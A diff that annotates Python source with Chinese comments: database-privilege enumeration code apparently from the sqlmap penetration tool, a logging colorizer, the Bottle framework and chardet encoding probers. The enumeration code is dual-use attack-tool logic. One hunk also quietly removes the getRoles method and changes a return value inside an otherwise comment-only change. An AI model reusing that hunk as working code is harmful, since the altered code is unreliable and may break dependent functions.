@ -586,14 +650,14 @@ class Users(object):
for priv in privs: for priv in privs:
if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS: if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[i]) privileges.add(PGSQL_PRIVS[i]) # PostgreSQL的权限处理
i += 1 i += 1
# In MySQL >= 5.0 and Oracle we get the list # In MySQL >= 5.0 and Oracle we get the list
# of privileges as string # of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
# In MySQL < 5.0 we get Y if the privilege is # In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise # True, N otherwise
@ -606,19 +670,19 @@ class Users(object):
if priv.upper() == 'Y': if priv.upper() == 'Y':
for position, mysqlPriv in MYSQL_PRIVS.items(): for position, mysqlPriv in MYSQL_PRIVS.items():
if position == i: if position == i:
privileges.add(mysqlPriv) privileges.add(mysqlPriv) # MySQL 5.0以下版本的权限处理
i += 1 i += 1
# In Firebird we get one letter for each privilege # In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS: if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
# In Informix we get one letter for the highest privilege # In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
if privilege.strip() in INFORMIX_PRIVS: if privilege.strip() in INFORMIX_PRIVS:
privileges.add(INFORMIX_PRIVS[privilege.strip()]) privileges.add(INFORMIX_PRIVS[privilege.strip()]) # Informix的权限处理
# In DB2 we get Y or G if the privilege is # In DB2 we get Y or G if the privilege is
# True, N otherwise # True, N otherwise
@ -633,7 +697,7 @@ class Users(object):
if priv.upper() in ('Y', 'G'): if priv.upper() in ('Y', 'G'):
for position, db2Priv in DB2_PRIVS.items(): for position, db2Priv in DB2_PRIVS.items():
if position == i: if position == i:
privilege += ", " + db2Priv privilege += ", " + db2Priv # DB2的权限处理
i += 1 i += 1
@ -661,13 +725,6 @@ class Users(object):
for user, privileges in kb.data.cachedUsersPrivileges.items(): for user, privileges in kb.data.cachedUsersPrivileges.items():
if isAdminFromPrivileges(privileges): if isAdminFromPrivileges(privileges):
areAdmins.add(user) areAdmins.add(user) # 判断是否为DBA
return (kb.data.cachedUsersPrivileges, areAdmins)
def getRoles(self, query2=False):
warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
warnMsg += "exist. sqlmap will enumerate privileges instead"
logger.warning(warnMsg)
return self.getPrivileges(query2) return (kb.data.cachedUsersPrivileges)

@ -7,7 +7,7 @@ import logging
import re import re
import sys import sys
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN # 导入一个设置用于判断是否在Windows系统上运行
if IS_WIN: if IS_WIN:
import ctypes import ctypes
@ -16,14 +16,15 @@ if IS_WIN:
# Reference: https://gist.github.com/vsajip/758430 # Reference: https://gist.github.com/vsajip/758430
# https://github.com/ipython/ipython/issues/4252 # https://github.com/ipython/ipython/issues/4252
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx
# 设置Windows API函数SetConsoleTextAttribute的参数和返回值类型
ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD]
ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL
def stdoutEncode(data): # Cross-referenced function def stdoutEncode(data): # 用于编码标准输出数据的函数
return data return data
class ColorizingStreamHandler(logging.StreamHandler): class ColorizingStreamHandler(logging.StreamHandler):
# color names to indices # 定义颜色名称到索引的映射
color_map = { color_map = {
'black': 0, 'black': 0,
'red': 1, 'red': 1,
@ -35,7 +36,7 @@ class ColorizingStreamHandler(logging.StreamHandler):
'white': 7, 'white': 7,
} }
# levels to (background, foreground, bold/intense) # 定义日志级别到颜色和样式的映射
level_map = { level_map = {
logging.DEBUG: (None, 'blue', False), logging.DEBUG: (None, 'blue', False),
logging.INFO: (None, 'green', False), logging.INFO: (None, 'green', False),
@ -43,25 +44,30 @@ class ColorizingStreamHandler(logging.StreamHandler):
logging.ERROR: (None, 'red', False), logging.ERROR: (None, 'red', False),
logging.CRITICAL: ('red', 'white', False) logging.CRITICAL: ('red', 'white', False)
} }
csi = '\x1b[' csi = '\x1b[' # ANSI转义序列的前缀
reset = '\x1b[0m' reset = '\x1b[0m' # ANSI重置颜色的转义序列
bold = "\x1b[1m" bold = "\x1b[1m" # ANSI加粗的转义序列
disable_coloring = False disable_coloring = False # 是否禁用颜色
@property @property
def is_tty(self): def is_tty(self):
# 检查流是否是终端
isatty = getattr(self.stream, 'isatty', None) isatty = getattr(self.stream, 'isatty', None)
return isatty and isatty() and not self.disable_coloring return isatty and isatty() and not self.disable_coloring
def emit(self, record): def emit(self, record):
# 发送日志记录
try: try:
message = stdoutEncode(self.format(record)) message = stdoutEncode(self.format(record))
stream = self.stream stream = self.stream
#如果当前流不是TTY直接写入消息
if not self.is_tty: if not self.is_tty:
if message and message[0] == "\r": if message and message[0] == "\r":
message = message[1:] message = message[1:]
stream.write(message) stream.write(message)
#如果是TTY调用output_colorized方法来输出带颜色的消息
else: else:
self.output_colorized(message) self.output_colorized(message)
stream.write(getattr(self, 'terminator', '\n')) stream.write(getattr(self, 'terminator', '\n'))
@ -70,15 +76,19 @@ class ColorizingStreamHandler(logging.StreamHandler):
except (KeyboardInterrupt, SystemExit): except (KeyboardInterrupt, SystemExit):
raise raise
except IOError: except IOError:
#IO错误时什么也不做pass
pass pass
except: except:
#其他异常时调用handleError方法
self.handleError(record) self.handleError(record)
if not IS_WIN: if not IS_WIN:
def output_colorized(self, message): def output_colorized(self, message):
# 如果不是Windows系统直接写入消息
self.stream.write(message) self.stream.write(message)
else: else:
ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m') ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m')
# 正则表达式用于匹配ANSI转义序列
nt_color_map = { nt_color_map = {
0: 0x00, # black 0: 0x00, # black
@ -92,26 +102,32 @@ class ColorizingStreamHandler(logging.StreamHandler):
} }
def output_colorized(self, message): def output_colorized(self, message):
# 如果是Windows系统解析ANSI转义序列并设置控制台颜色
parts = self.ansi_esc.split(message) parts = self.ansi_esc.split(message)
h = None h = None
fd = getattr(self.stream, 'fileno', None) fd = getattr(self.stream, 'fileno', None)
#文件描述符有效并且是标准输出或标准错误获取对应的Windows句柄
if fd is not None: if fd is not None:
fd = fd() fd = fd()
if fd in (1, 2): # stdout or stderr if fd in (1, 2): # stdout or stderr
h = ctypes.windll.kernel32.GetStdHandle(-10 - fd) h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)
#循环处理分割后的消息部分
while parts: while parts:
text = parts.pop(0) text = parts.pop(0)
#如果部分是文本,写入并刷新流
if text: if text:
self.stream.write(text) self.stream.write(text)
self.stream.flush() self.stream.flush()
#如果还有部分,取出下一个部分作为参数
if parts: if parts:
params = parts.pop(0) params = parts.pop(0)
#如果句柄有效,将参数分割并转换为整数,初始化颜色代码
if h is not None: if h is not None:
params = [int(p) for p in params.split(';')] params = [int(p) for p in params.split(';')]
color = 0 color = 0
@ -131,9 +147,12 @@ class ColorizingStreamHandler(logging.StreamHandler):
ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) ctypes.windll.kernel32.SetConsoleTextAttribute(h, color)
def _reset(self, message): def _reset(self, message):
#重置消息的颜色
if not message.endswith(self.reset): if not message.endswith(self.reset):
# 如果消息不以重置序列结尾,则添加重置序列
reset = self.reset reset = self.reset
elif self.bold in message: # bold elif self.bold in message:
# 如果消息包含加粗,则在重置后加粗
reset = self.reset + self.bold reset = self.reset + self.bold
else: else:
reset = self.reset reset = self.reset
@ -141,19 +160,23 @@ class ColorizingStreamHandler(logging.StreamHandler):
return reset return reset
def colorize(self, message, levelno): def colorize(self, message, levelno):
# 根据日志级别给消息上色
if levelno in self.level_map and self.is_tty: if levelno in self.level_map and self.is_tty:
bg, fg, bold = self.level_map[levelno] bg, fg, bold = self.level_map[levelno]
params = [] params = []
#如果背景色有效,添加背景色参数
if bg in self.color_map: if bg in self.color_map:
params.append(str(self.color_map[bg] + 40)) params.append(str(self.color_map[bg] + 40))
#如果前景色有效,添加前景色参数
if fg in self.color_map: if fg in self.color_map:
params.append(str(self.color_map[fg] + 30)) params.append(str(self.color_map[fg] + 30))
#如果需要加粗,添加加粗参数
if bold: if bold:
params.append('1') params.append('1')
#如果参数和消息都有效,检查消息是否有前缀(空格),并提取出来
if params and message: if params and message:
if message.lstrip() != message: if message.lstrip() != message:
prefix = re.search(r"\s+", message).group(0) prefix = re.search(r"\s+", message).group(0)
@ -167,5 +190,6 @@ class ColorizingStreamHandler(logging.StreamHandler):
return message return message
def format(self, record): def format(self, record):
# 格式化日志记录
message = logging.StreamHandler.format(self, record) message = logging.StreamHandler.format(self, record)
return self.colorize(message, record.levelno) return self.colorize(message, record.levelno)

File diff suppressed because it is too large Load Diff

@ -29,9 +29,12 @@ __license__ = 'MIT'
def _cli_parse(args): # pragma: no coverage def _cli_parse(args): # pragma: no coverage
# 导入ArgumentParser模块
from argparse import ArgumentParser from argparse import ArgumentParser
# 创建ArgumentParser对象设置程序名称和用法
parser = ArgumentParser(prog=args[0], usage="%(prog)s [options] package.module:app") parser = ArgumentParser(prog=args[0], usage="%(prog)s [options] package.module:app")
# 添加参数
opt = parser.add_argument opt = parser.add_argument
opt("--version", action="store_true", help="show version number.") opt("--version", action="store_true", help="show version number.")
opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
@ -45,6 +48,7 @@ def _cli_parse(args): # pragma: no coverage
opt("--reload", action="store_true", help="auto-reload on file changes.") opt("--reload", action="store_true", help="auto-reload on file changes.")
opt('app', help='WSGI app entry point.', nargs='?') opt('app', help='WSGI app entry point.', nargs='?')
# 解析命令行参数
cli_args = parser.parse_args(args[1:]) cli_args = parser.parse_args(args[1:])
return cli_args, parser return cli_args, parser
@ -179,7 +183,9 @@ def depr(major, minor, cause, fix):
def makelist(data): # This is just too handy def makelist(data): # This is just too handy
# 判断data是否为元组、列表、集合或字典类型
if isinstance(data, (tuple, list, set, dict)): if isinstance(data, (tuple, list, set, dict)):
# 如果是则返回data的列表形式
return list(data) return list(data)
elif data: elif data:
return [data] return [data]
@ -198,18 +204,24 @@ class DictProperty(object):
self.getter, self.key = func, self.key or func.__name__ self.getter, self.key = func, self.key or func.__name__
return self return self
# 如果obj为None则返回self
def __get__(self, obj, cls): def __get__(self, obj, cls):
# 获取属性名和存储对象
if obj is None: return self if obj is None: return self
# 如果属性名不在存储对象中则调用getter方法获取值并存储
key, storage = self.key, getattr(obj, self.attr) key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj) if key not in storage: storage[key] = self.getter(obj)
return storage[key] return storage[key]
# 如果属性是只读的则抛出AttributeError异常
def __set__(self, obj, value): def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.") if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj): def __delete__(self, obj):
# 如果属性是只读的则抛出AttributeError异常
if self.read_only: raise AttributeError("Read-Only property.") if self.read_only: raise AttributeError("Read-Only property.")
# 从存储对象中删除对应的值
del getattr(obj, self.attr)[self.key] del getattr(obj, self.attr)[self.key]
@ -737,26 +749,38 @@ class Bottle(object):
self.route('/' + '/'.join(segments), **options) self.route('/' + '/'.join(segments), **options)
def _mount_app(self, prefix, app, **options): def _mount_app(self, prefix, app, **options):
# 检查app是否已经被挂载或者app的config中是否已经存在'_mount.app'键
if app in self._mounts or '_mount.app' in app.config: if app in self._mounts or '_mount.app' in app.config:
# 如果app已经被挂载或者app的config中已经存在'_mount.app'键则发出警告并回退到WSGI挂载
depr(0, 13, "Application mounted multiple times. Falling back to WSGI mount.", depr(0, 13, "Application mounted multiple times. Falling back to WSGI mount.",
"Clone application before mounting to a different location.") "Clone application before mounting to a different location.")
return self._mount_wsgi(prefix, app, **options) return self._mount_wsgi(prefix, app, **options)
# 检查options是否为空
if options: if options:
# 如果options不为空则发出警告并回退到WSGI挂载
depr(0, 13, "Unsupported mount options. Falling back to WSGI mount.", depr(0, 13, "Unsupported mount options. Falling back to WSGI mount.",
"Do not specify any route options when mounting bottle application.") "Do not specify any route options when mounting bottle application.")
return self._mount_wsgi(prefix, app, **options) return self._mount_wsgi(prefix, app, **options)
# 检查prefix是否以'/'结尾
if not prefix.endswith("/"): if not prefix.endswith("/"):
# 如果prefix不以'/'结尾则发出警告并回退到WSGI挂载
depr(0, 13, "Prefix must end in '/'. Falling back to WSGI mount.", depr(0, 13, "Prefix must end in '/'. Falling back to WSGI mount.",
"Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.") "Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.")
return self._mount_wsgi(prefix, app, **options) return self._mount_wsgi(prefix, app, **options)
# 将app添加到_mounts列表中
self._mounts.append(app) self._mounts.append(app)
# 将prefix添加到app的config中
app.config['_mount.prefix'] = prefix app.config['_mount.prefix'] = prefix
# 将self添加到app的config中
app.config['_mount.app'] = self app.config['_mount.app'] = self
# 遍历app的routes
for route in app.routes: for route in app.routes:
# 将route的rule修改为prefix + route.rule.lstrip('/')
route.rule = prefix + route.rule.lstrip('/') route.rule = prefix + route.rule.lstrip('/')
# 将修改后的route添加到self的routes中
self.add_route(route) self.add_route(route)
def mount(self, prefix, app, **options): def mount(self, prefix, app, **options):
@ -781,11 +805,15 @@ class Bottle(object):
parent application. parent application.
""" """
# 检查prefix是否以'/'开头
if not prefix.startswith('/'): if not prefix.startswith('/'):
# 如果prefix不以'/'开头则抛出ValueError异常
raise ValueError("Prefix must start with '/'") raise ValueError("Prefix must start with '/'")
# 如果app是Bottle实例则调用_mount_app方法
if isinstance(app, Bottle): if isinstance(app, Bottle):
return self._mount_app(prefix, app, **options) return self._mount_app(prefix, app, **options)
# 否则调用_mount_wsgi方法
else: else:
return self._mount_wsgi(prefix, app, **options) return self._mount_wsgi(prefix, app, **options)
@ -1089,31 +1117,46 @@ class Bottle(object):
def wsgi(self, environ, start_response): def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """ """ The bottle WSGI-interface. """
try: try:
# 将environ传递给_handle方法获取返回值
out = self._cast(self._handle(environ)) out = self._cast(self._handle(environ))
# rfc2616 section 4.3 # rfc2616 section 4.3
# 如果返回的状态码是100, 101, 204, 304或者请求方法是HEAD则关闭输出流
if response._status_code in (100, 101, 204, 304)\ if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD': or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close() if hasattr(out, 'close'): out.close()
out = [] out = []
# 获取environ中的bottle.exc_info
exc_info = environ.get('bottle.exc_info') exc_info = environ.get('bottle.exc_info')
# 如果有异常信息则删除environ中的bottle.exc_info
if exc_info is not None: if exc_info is not None:
del environ['bottle.exc_info'] del environ['bottle.exc_info']
# 调用start_response方法设置响应状态行、响应头和异常信息
start_response(response._wsgi_status_line(), response.headerlist, exc_info) start_response(response._wsgi_status_line(), response.headerlist, exc_info)
# 返回输出流
return out return out
except (KeyboardInterrupt, SystemExit, MemoryError): except (KeyboardInterrupt, SystemExit, MemoryError):
# 如果捕获到KeyboardInterrupt, SystemExit, MemoryError异常则抛出
raise raise
except Exception as E: except Exception as E:
# 如果没有开启catchall则抛出异常
if not self.catchall: raise if not self.catchall: raise
# 构造错误页面
err = '<h1>Critical error while processing request: %s</h1>' \ err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/')) % html_escape(environ.get('PATH_INFO', '/'))
# 如果开启了DEBUG模式则输出错误信息和堆栈信息
if DEBUG: if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \ err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \ '<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(E)), html_escape(format_exc())) % (html_escape(repr(E)), html_escape(format_exc()))
# 将错误页面写入environ中的wsgi.errors
environ['wsgi.errors'].write(err) environ['wsgi.errors'].write(err)
# 刷新wsgi.errors
environ['wsgi.errors'].flush() environ['wsgi.errors'].flush()
# 设置响应头
headers = [('Content-Type', 'text/html; charset=UTF-8')] headers = [('Content-Type', 'text/html; charset=UTF-8')]
# 调用start_response方法设置响应状态行、响应头和异常信息
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
# 返回错误页面
return [tob(err)] return [tob(err)]
def __call__(self, environ, start_response): def __call__(self, environ, start_response):

@ -15,7 +15,6 @@
# 02110-1301 USA # 02110-1301 USA
######################### END LICENSE BLOCK ######################### ######################### END LICENSE BLOCK #########################
from .compat import PY2, PY3 from .compat import PY2, PY3
from .universaldetector import UniversalDetector from .universaldetector import UniversalDetector
from .version import __version__, VERSION from .version import __version__, VERSION
@ -25,15 +24,28 @@ def detect(byte_str):
""" """
Detect the encoding of the given byte string. Detect the encoding of the given byte string.
This function uses the UniversalDetector class to determine the encoding
of a given byte string. It creates a new UniversalDetector instance,
feeds the byte string to it, and then returns the detected encoding.
:param byte_str: The byte sequence to examine. :param byte_str: The byte sequence to examine.
:type byte_str: ``bytes`` or ``bytearray`` :type byte_str: ``bytes`` or ``bytearray``
:return: The detected encoding.
""" """
# Check if the input is of the correct type
if not isinstance(byte_str, bytearray): if not isinstance(byte_str, bytearray):
if not isinstance(byte_str, bytes): if not isinstance(byte_str, bytes):
raise TypeError('Expected object of type bytes or bytearray, got: ' raise TypeError('Expected object of type bytes or bytearray, got: '
'{0}'.format(type(byte_str))) '{0}'.format(type(byte_str)))
else: else:
# If the input is of type bytes, convert it to bytearray
byte_str = bytearray(byte_str) byte_str = bytearray(byte_str)
# Create a new UniversalDetector instance
detector = UniversalDetector() detector = UniversalDetector()
# Feed the byte string to the detector
detector.feed(byte_str) detector.feed(byte_str)
# Close the detector and return the detected encoding
return detector.close() return detector.close()

@ -32,10 +32,15 @@ from .mbcssm import BIG5_SM_MODEL
class Big5Prober(MultiByteCharSetProber): class Big5Prober(MultiByteCharSetProber):
# 初始化Big5Prober类
def __init__(self): def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(Big5Prober, self).__init__() super(Big5Prober, self).__init__()
# 初始化Big5编码状态机
self.coding_sm = CodingStateMachine(BIG5_SM_MODEL) self.coding_sm = CodingStateMachine(BIG5_SM_MODEL)
# 初始化Big5分布分析器
self.distribution_analyzer = Big5DistributionAnalysis() self.distribution_analyzer = Big5DistributionAnalysis()
# 重置Big5Prober类
self.reset() self.reset()
@property @property

@ -30,69 +30,126 @@ from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber): class CharSetGroupProber(CharSetProber):
# 初始化函数,传入语言过滤器
def __init__(self, lang_filter=None): def __init__(self, lang_filter=None):
# 调用父类的初始化函数
super(CharSetGroupProber, self).__init__(lang_filter=lang_filter) super(CharSetGroupProber, self).__init__(lang_filter=lang_filter)
# 初始化活动探测器数量
self._active_num = 0 self._active_num = 0
# 初始化探测器列表
self.probers = [] self.probers = []
# 初始化最佳猜测探测器
self._best_guess_prober = None self._best_guess_prober = None
# 重置函数
def reset(self): def reset(self):
# 调用父类的重置函数
super(CharSetGroupProber, self).reset() super(CharSetGroupProber, self).reset()
# 重置活动探测器数量
self._active_num = 0 self._active_num = 0
# 遍历探测器列表
for prober in self.probers: for prober in self.probers:
# 如果探测器存在
if prober: if prober:
# 重置探测器
prober.reset() prober.reset()
# 设置探测器为活动状态
prober.active = True prober.active = True
# 活动探测器数量加一
self._active_num += 1 self._active_num += 1
# 重置最佳猜测探测器
self._best_guess_prober = None self._best_guess_prober = None
# 获取字符集名称的属性函数
@property @property
def charset_name(self): def charset_name(self):
# 如果最佳猜测探测器不存在
if not self._best_guess_prober: if not self._best_guess_prober:
# 调用获取置信度函数
self.get_confidence() self.get_confidence()
# 如果最佳猜测探测器仍然不存在
if not self._best_guess_prober: if not self._best_guess_prober:
# 返回None
return None return None
# 返回最佳猜测探测器的字符集名称
return self._best_guess_prober.charset_name return self._best_guess_prober.charset_name
# 获取语言的属性函数
@property @property
def language(self): def language(self):
# 如果最佳猜测探测器不存在
if not self._best_guess_prober: if not self._best_guess_prober:
# 调用获取置信度函数
self.get_confidence() self.get_confidence()
# 如果最佳猜测探测器仍然不存在
if not self._best_guess_prober: if not self._best_guess_prober:
# 返回None
return None return None
# 返回最佳猜测探测器的语言
return self._best_guess_prober.language return self._best_guess_prober.language
# 接收字节字符串的函数
def feed(self, byte_str): def feed(self, byte_str):
# 遍历探测器列表
for prober in self.probers: for prober in self.probers:
# 如果探测器不存在
if not prober: if not prober:
# 跳过
continue continue
# 如果探测器不是活动状态
if not prober.active: if not prober.active:
# 跳过
continue continue
# 调用探测器接收字节字符串的函数
state = prober.feed(byte_str) state = prober.feed(byte_str)
# 如果探测器返回的状态不是FOUND_IT
if not state: if not state:
# 跳过
continue continue
# 如果探测器返回的状态是FOUND_IT
if state == ProbingState.FOUND_IT: if state == ProbingState.FOUND_IT:
# 设置最佳猜测探测器为当前探测器
self._best_guess_prober = prober self._best_guess_prober = prober
# 返回当前探测器的状态
return self.state return self.state
# 如果探测器返回的状态是NOT_ME
elif state == ProbingState.NOT_ME: elif state == ProbingState.NOT_ME:
# 设置探测器为非活动状态
prober.active = False prober.active = False
# 活动探测器数量减一
self._active_num -= 1 self._active_num -= 1
# 如果活动探测器数量小于等于0
if self._active_num <= 0: if self._active_num <= 0:
# 设置当前探测器的状态为NOT_ME
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
# 返回当前探测器的状态
return self.state return self.state
# 返回当前探测器的状态
return self.state return self.state
# 获取置信度的函数
def get_confidence(self): def get_confidence(self):
# 获取当前探测器的状态
state = self.state state = self.state
# 如果当前探测器的状态是FOUND_IT
if state == ProbingState.FOUND_IT: if state == ProbingState.FOUND_IT:
# 返回0.99
return 0.99 return 0.99
# 如果当前探测器的状态是NOT_ME
elif state == ProbingState.NOT_ME: elif state == ProbingState.NOT_ME:
# 返回0.01
return 0.01 return 0.01
# 初始化最佳置信度
best_conf = 0.0 best_conf = 0.0
# 重置最佳猜测探测器
self._best_guess_prober = None self._best_guess_prober = None
# 遍历探测器列表
for prober in self.probers: for prober in self.probers:
# 如果探测器不存在
if not prober: if not prober:
# 跳过
continue continue
# 如果探测器不是活动状态
if not prober.active: if not prober.active:
self.logger.debug('%s not active', prober.charset_name) self.logger.debug('%s not active', prober.charset_name)
continue continue

@ -34,32 +34,42 @@ from .enums import ProbingState
class CharSetProber(object): class CharSetProber(object):
# 定义一个阈值,当检测到的字符集概率大于这个值时,认为检测成功
SHORTCUT_THRESHOLD = 0.95 SHORTCUT_THRESHOLD = 0.95
def __init__(self, lang_filter=None): def __init__(self, lang_filter=None):
# 初始化状态为检测中
self._state = None self._state = None
# 设置语言过滤器
self.lang_filter = lang_filter self.lang_filter = lang_filter
# 获取日志记录器
self.logger = logging.getLogger(__name__) self.logger = logging.getLogger(__name__)
def reset(self): def reset(self):
# 重置状态为检测中
self._state = ProbingState.DETECTING self._state = ProbingState.DETECTING
@property @property
def charset_name(self): def charset_name(self):
# 返回字符集名称这里返回None
return None return None
def feed(self, buf): def feed(self, buf):
# 接收输入的缓冲区
pass pass
@property @property
def state(self): def state(self):
# 返回当前状态
return self._state return self._state
def get_confidence(self): def get_confidence(self):
# 返回检测到的字符集的概率这里返回0.0
return 0.0 return 0.0
@staticmethod @staticmethod
def filter_high_byte_only(buf): def filter_high_byte_only(buf):
# 过滤掉所有非高字节字符
buf = re.sub(b'([\x00-\x7F])+', b' ', buf) buf = re.sub(b'([\x00-\x7F])+', b' ', buf)
return buf return buf

@ -53,20 +53,29 @@ class CodingStateMachine(object):
encoding from consideration from here on. encoding from consideration from here on.
""" """
def __init__(self, sm): def __init__(self, sm):
# 初始化函数sm为传入的模型
self._model = sm self._model = sm
# 当前字节位置
self._curr_byte_pos = 0 self._curr_byte_pos = 0
# 当前字符长度
self._curr_char_len = 0 self._curr_char_len = 0
# 当前状态
self._curr_state = None self._curr_state = None
# 获取logger
self.logger = logging.getLogger(__name__) self.logger = logging.getLogger(__name__)
# 重置
self.reset() self.reset()
def reset(self): def reset(self):
# 重置函数,将当前状态设置为起始状态
self._curr_state = MachineState.START self._curr_state = MachineState.START
def next_state(self, c): def next_state(self, c):
# for each byte we get its class # for each byte we get its class
# if it is first byte, we also get byte length # if it is first byte, we also get byte length
# 获取当前字节的类别
byte_class = self._model['class_table'][c] byte_class = self._model['class_table'][c]
# 如果当前状态为起始状态,则获取当前字符长度
if self._curr_state == MachineState.START: if self._curr_state == MachineState.START:
self._curr_byte_pos = 0 self._curr_byte_pos = 0
self._curr_char_len = self._model['char_len_table'][byte_class] self._curr_char_len = self._model['char_len_table'][byte_class]

@ -22,13 +22,20 @@
import sys import sys
# 判断当前Python版本是否小于3.0
if sys.version_info < (3, 0): if sys.version_info < (3, 0):
# 如果是Python2版本
PY2 = True PY2 = True
PY3 = False PY3 = False
# 定义base_str为str和unicode类型
base_str = (str, unicode) base_str = (str, unicode)
# 定义text_type为unicode类型
text_type = unicode text_type = unicode
else: else:
# 如果是Python3版本
PY2 = False PY2 = False
PY3 = True PY3 = True
# 定义base_str为bytes和str类型
base_str = (bytes, str) base_str = (bytes, str)
# 定义text_type为str类型
text_type = str text_type = str

@ -40,62 +40,95 @@ class EscCharSetProber(CharSetProber):
""" """
def __init__(self, lang_filter=None): def __init__(self, lang_filter=None):
# 初始化EscCharSetProber类
super(EscCharSetProber, self).__init__(lang_filter=lang_filter) super(EscCharSetProber, self).__init__(lang_filter=lang_filter)
# 初始化编码状态机列表
self.coding_sm = [] self.coding_sm = []
# 如果语言过滤器包含简体中文
if self.lang_filter & LanguageFilter.CHINESE_SIMPLIFIED: if self.lang_filter & LanguageFilter.CHINESE_SIMPLIFIED:
# 添加简体中文编码状态机
self.coding_sm.append(CodingStateMachine(HZ_SM_MODEL)) self.coding_sm.append(CodingStateMachine(HZ_SM_MODEL))
# 添加ISO2022CN编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022CN_SM_MODEL)) self.coding_sm.append(CodingStateMachine(ISO2022CN_SM_MODEL))
# 如果语言过滤器包含日语
if self.lang_filter & LanguageFilter.JAPANESE: if self.lang_filter & LanguageFilter.JAPANESE:
# 添加ISO2022JP编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022JP_SM_MODEL)) self.coding_sm.append(CodingStateMachine(ISO2022JP_SM_MODEL))
# 如果语言过滤器包含韩语
if self.lang_filter & LanguageFilter.KOREAN: if self.lang_filter & LanguageFilter.KOREAN:
# 添加ISO2022KR编码状态机
self.coding_sm.append(CodingStateMachine(ISO2022KR_SM_MODEL)) self.coding_sm.append(CodingStateMachine(ISO2022KR_SM_MODEL))
# 初始化活动状态机数量
self.active_sm_count = None self.active_sm_count = None
# 初始化检测到的字符集
self._detected_charset = None self._detected_charset = None
# 初始化检测到的语言
self._detected_language = None self._detected_language = None
# 初始化状态
self._state = None self._state = None
# 重置
self.reset() self.reset()
def reset(self): def reset(self):
# 重置EscCharSetProber类
super(EscCharSetProber, self).reset() super(EscCharSetProber, self).reset()
# 遍历编码状态机列表
for coding_sm in self.coding_sm: for coding_sm in self.coding_sm:
# 如果编码状态机为空,则跳过
if not coding_sm: if not coding_sm:
continue continue
# 设置编码状态机为活动状态
coding_sm.active = True coding_sm.active = True
# 重置编码状态机
coding_sm.reset() coding_sm.reset()
# 设置活动状态机数量为编码状态机列表的长度
self.active_sm_count = len(self.coding_sm) self.active_sm_count = len(self.coding_sm)
# 设置检测到的字符集为空
self._detected_charset = None self._detected_charset = None
# 设置检测到的语言为空
self._detected_language = None self._detected_language = None
@property @property
def charset_name(self): def charset_name(self):
# 返回检测到的字符集
return self._detected_charset return self._detected_charset
@property @property
def language(self): def language(self):
# 返回检测到的语言
return self._detected_language return self._detected_language
def get_confidence(self): def get_confidence(self):
# 如果检测到了字符集则返回0.99否则返回0.00
if self._detected_charset: if self._detected_charset:
return 0.99 return 0.99
else: else:
return 0.00 return 0.00
def feed(self, byte_str): def feed(self, byte_str):
# 遍历字节字符串
for c in byte_str: for c in byte_str:
# 遍历编码状态机列表
for coding_sm in self.coding_sm: for coding_sm in self.coding_sm:
# 如果编码状态机为空或非活动状态,则跳过
if not coding_sm or not coding_sm.active: if not coding_sm or not coding_sm.active:
continue continue
